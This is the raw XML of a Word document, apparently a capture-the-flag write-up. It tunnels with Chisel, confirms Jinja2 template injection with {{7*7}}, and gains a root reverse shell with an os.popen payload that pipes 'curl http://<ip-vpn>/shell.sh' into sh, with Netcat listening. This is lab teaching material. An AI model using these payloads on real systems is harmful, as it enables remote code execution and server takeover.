      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to the target machine.</w:t>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Note: Python server running in the same directory that contains the Chisel binary.</w:t>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8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40jxvap8304l" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Target Machine:</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http://&lt;ip-vpn&gt;/chisel -o chisel</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+x chisel</w:t>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7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Chisel on the target machine. Time to execute it:</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R:5000:127.0.0.1:5000</w:t>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68"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open </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the application in our browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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67100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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mz79lmagniw1" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-Side Template Injection (SSTI)</w:t>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Web applications commonly use server-side templating technologies (Jinja2, Twig, FreeMarker, etc.) to generate dynamic HTML responses.</w:t>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Server-Side Template Injection (SSTI) vulnerabilities occur when user input is unsafely embedded into a template, resulting in Remote Code Execution on the server.</w:t>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exploring the web page, I notice that whatever is passed in the search bar is reflected in the download button.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId38">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://127.0.0.1:5000</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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41800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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verify whether it is vulnerable to SSTI, I used the following payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">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{{7*7}} </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It returned </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">49</w:t>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87800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="80"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it is indeed vulnerable to SSTI. Since the application is written in Python, I will use a Jinja2 payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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-I http://127.0.0.1:5000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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HTTP/1.0 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Content-Type: text/html; charset=utf-8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Content-Length: 5838</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Server: Werkzeug/1.0.1 Python/3.6.9</w:t>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Date: Fri, 03 Sep 2021 19:10:53 GM</w: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khnf5kfv710s" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jinja2 Payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId41">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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use the following payload to determine which user the application is running as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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{{request.application.__globals__.__builtins__.__import__('os').popen('whoami').read()}}</w:t>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05300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="82"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it is running as root, the next step is to obtain a reverse shell on the server so we will have a root shell.</w:t>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Reverse shell payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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33800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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Python server.</w:t>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72"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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to listen on port 1337.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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55"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execute the following payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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{{request.application.__globals__.__builtins__.__import__('os').popen('curl http://&lt;ip-vpn&gt;/shell.sh | sh').read()}}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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76700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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 as user root, successfully capturing our final flag 😃</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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78"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headerReference r:id="rId48" w:type="default"/>
      <w:headerReference r:id="rId49" w:type="first"/>
      <w:headerReference r:id="rId50" w:type="even"/>
      <w:footerReference r:id="rId51" w:type="default"/>
      <w:footerReference r:id="rId52" w:type="first"/>
      <w:footerReference r:id="rId5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9">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="29"/>
    <w:bookmarkEnd w:id="2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3" name="image21.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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9A">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9B">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8"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Dosky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37.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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header" Target="header1.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.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training/training-machines/30"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yperlink" Target="https://github.com/jpillora/chisel" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1:5000" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.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32.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId12"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35.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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 Id="rId2"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8.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cE3v6wwsufZEi8f9CNOtw8GLvQ==">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